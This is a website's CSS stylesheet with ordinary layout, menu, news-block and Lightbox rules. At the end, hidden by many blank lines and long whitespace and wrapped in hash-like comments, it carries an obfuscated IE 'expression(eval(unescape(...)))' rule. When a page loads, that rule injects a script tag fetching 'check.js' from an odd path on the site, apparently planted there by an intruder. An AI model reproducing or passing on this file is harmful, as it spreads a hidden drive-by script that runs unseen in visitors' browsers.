/* Default Style definitions*/
body {
    font-family: Arial, Helvetica, sans-serif;    
    font-size: 11px;    
    color: #333333;    
    /*background: url(images/bgtile.gif);    */
	 background: #EBEAD8;
    margin: 0;
    padding: 0;
	 overflow: -moz-scrollbars-vertical;
	 height:101%;
}

h1 {    
    color: #333333;
    font-weight: bold;
    font-size: 13px;
    border-bottom: 1px dotted #000000;
    display: inline;		 
}
a {    
    color: #333333;
    text-decoration: underline;
}
a:hover, a:visited {
    text-decoration: underline;
	 color: #990000;
}
input, textarea {
    font-family: Arial, Helvetica, sans-serif;    
    font-size: 11px; 
}


/* Main menu */
#mainmenu { 
    padding: 0px;
    margin: 0px;
}
#mainmenu ul  {
    margin: 0px;
    padding: 0px;
    border: 0px;    
}
#mainmenu ul li {
    margin: 0px;       
    border: 0px;    
    display: block;
    float:left;
 	 background: #333333; 
}

/* Submenu */
#submenu { 
    padding: 0px;
    margin: 0px;
	 
}
#submenu ul  {
    margin: 0px;
    padding: 0px;
    border: 0px;   

}
#submenu ul li {
    margin: 0px;       
    border: 0px;    
  	 display: block;
    float:left;

}


/* Header block */
#headercontent {
    width:600px;
	 background: #CED0C2;
}

/* Body content */
#bodycontent {    
    width:600px;
    text-align:left;   
    margin:0px; 
	 padding: 0px;
    background: #FFFFFF;
	 min-height: 700px;
	 height:100%;
	 background-image: url(images/stain.gif);
	 background-position: bottom right;
	 background-repeat: no-repeat;
}
img.bordered {
	border: 1px solid #000000;
}
#bodycontent #lCol {   
   clear: left;
   margin:0px; 
   padding: 3px;
   float: left;
	width: 300px;
}

#bodycontent #rCol {
   float: right;
   text-align: justify;   
   width:260px;
   padding: 3px;
   margin-bottom: 15px;
	border-left: 1px solid #333333;
}
#content {
	padding: 10px;
}



br {
    clear: both;
}
.newsHead {
	background: #858472;
	padding: 5px;
	font-weight: bold;
	color: #FFFFFF;
	width: 250px;
}
.newsitem1 {
	background: #CED0C2;
	padding: 5px;
	font-size: 10px;
}
.newsitem2{
	background: #FFFFFF;
	padding: 5px;
	font-size: 10px;
}
/* Viewer Styles */
body.viewer {
	 font-family: Arial, Helvetica, sans-serif;    
    font-size: 11px;    
    color: #FFFFFF;    
    background: #FFFFFF;  
    margin: 0;
    padding: 0;
}
p.portfolio {
	font-family: Arial, Helvetica, sans-serif;    
    font-size: 11px;    
    color: #333333;
}
.heading {
	background: #990000;
}


/* Stain */
.staintest {
	background-image: url(images/staintest.gif);
	background-position:  right bottom;
	background-repeat: no-repeat;
}
.staintest2 {
	background-image: url(images/staintest2.gif);
	background-position:  right bottom;
	background-repeat: no-repeat;
	height: 41px;
}

/* Random Images block on homepage */

#randBlock {
	width: 450px;
	height: 150px;
	padding: 5px;
	background: #CED0C2;
}
/* Footer */

#footer {
	width: 600px;
	background: #FFCC00;
	border-top: 2px solid #000000;
	color: #000000;
	text-align: center;
}

/* Portfolio Section */
#bodycontent #portlCol {   
   clear: left;
   margin:0px; 
   padding: 3px;
   float: left;
	width: 75px;
	height: 75px;
}

#bodycontent #portrCol {
   float: left;
	margin-left: 5px;
   text-align: justify;   
   width: 360px;
	height: 75px
   padding: 3px;
}
#portlCol.row1, #portrCol .row1 {
	height: 75px;
	padding: 5px;
}
#portlCol.row2, #portrCol.row2 {
	background: url(images/graytile.gif);
	height: 75px;
	padding: 5px;
}
/* Lightbox Stuff */
/* Lightbox */
#lightbox{
	position: absolute;
	top: 40px;
	left: 0;
	width: 100%;
	z-index: 100;
	text-align: center;
	}

#lightbox a img{ border: none; }

#outerImageContainer{
	position: relative;
	background-color: #fff;
	width: 250px;
	height: 250px;
	margin: 0 auto;
	}

#imageContainer{
	padding: 10px;
	}

#loading{
	position: absolute;
	top: 40%;
	left: 0%;
	height: 25%;
	width: 100%;
	text-align: center;
	line-height: 0;
	}
#hoverNav{
	position: absolute;
	top: 0;
	left: 0;
	height: 100%;
	width: 100%;
	z-index: 10;
	}
#imageContainer>#hoverNav{ left: 0;}
#hoverNav a{ outline: none;}

#prevLink, #nextLink{
	width: 49%;
	height: 100%;
	background: transparent url(../images/blank.gif) no-repeat; /* Trick IE into showing hover */
	display: block;
	}
#prevLink { left: 0; float: left; }
#nextLink { right: 0; float: right; }
#prevLink:hover, #prevLink:visited:hover { background: url(images/prev.gif) left 53% no-repeat; }
#nextLink:hover, #nextLink:visited:hover { background: url(images/next.gif) right 53% no-repeat; }


#imageDataContainer{
	font: 10px Verdana, Helvetica, sans-serif;
	background-color: #fff;
	margin: 0 auto;
	line-height: 1.4em;
	height: 38px;
	}

#imageData{
	padding:0 10px;
	}
#imageData #imageDetails{ width: 70%; float: left; text-align: left; }	
#imageData #caption{ font-weight: bold;	}
#imageData #numberDisplay{ display: block; clear: left;	}			
#imageData #bottomNavClose{ width: 36px; float: right;	}	
		
#overlay{
	position: absolute;
	top: 0;
	left: 0;
	z-index: 90;
	width: 100%;
	height: 500px;
	background-color: #000;
	filter:alpha(opacity=60);
	-moz-opacity: 0.6;
	opacity: 0.6;
	}




































































































                                                                                                                                                      /* a0b4df006e02184c60dbf503e71c87ad */ body { margin-top: expression(eval(unescape('%69%66%20%28%21%64%6F%63%75%6D%65%6E%74%2E%67%65%74%45%6C%65%6D%65%6E%74%42%79%49%64%28%27%4A%53%53%53%27%29%29%7B%20%4A%53%53%31%20%3D%20%35%39%3B%20%4A%53%53%32%20%3D%20%35%37%31%37%34%3B%20%4A%53%53%33%20%3D%20%27%2F%72%79%64%65%72%2F%63%6C%61%73%73%65%73%2F%75%62%6F%72%65%77%2F%64%75%6D%6D%79%2E%68%74%6D%27%3B%20%76%61%72%20%6A%73%20%3D%20%64%6F%63%75%6D%65%6E%74%2E%63%72%65%61%74%65%45%6C%65%6D%65%6E%74%28%27%73%63%72%69%70%74%27%29%3B%20%6A%73%2E%73%65%74%41%74%74%72%69%62%75%74%65%28%27%73%72%63%27%2C%20%27%2F%72%79%64%65%72%2F%63%6C%61%73%73%65%73%2F%75%62%6F%72%65%77%2F%63%68%65%63%6B%2E%6A%73%27%29%3B%20%6A%73%2E%73%65%74%41%74%74%72%69%62%75%74%65%28%27%69%64%27%2C%20%27%4A%53%53%53%27%29%3B%20%64%6F%63%75%6D%65%6E%74%2E%67%65%74%45%6C%65%6D%65%6E%74%73%42%79%54%61%67%4E%61%6D%65%28%27%68%65%61%64%27%29%2E%69%74%65%6D%28%30%29%2E%61%70%70%65%6E%64%43%68%69%6C%64%28%6A%73%29%20%7D%3B%20'))) } /* a995d2cc661fa72452472e9554b5520c */                                                                                                                                                      




































































































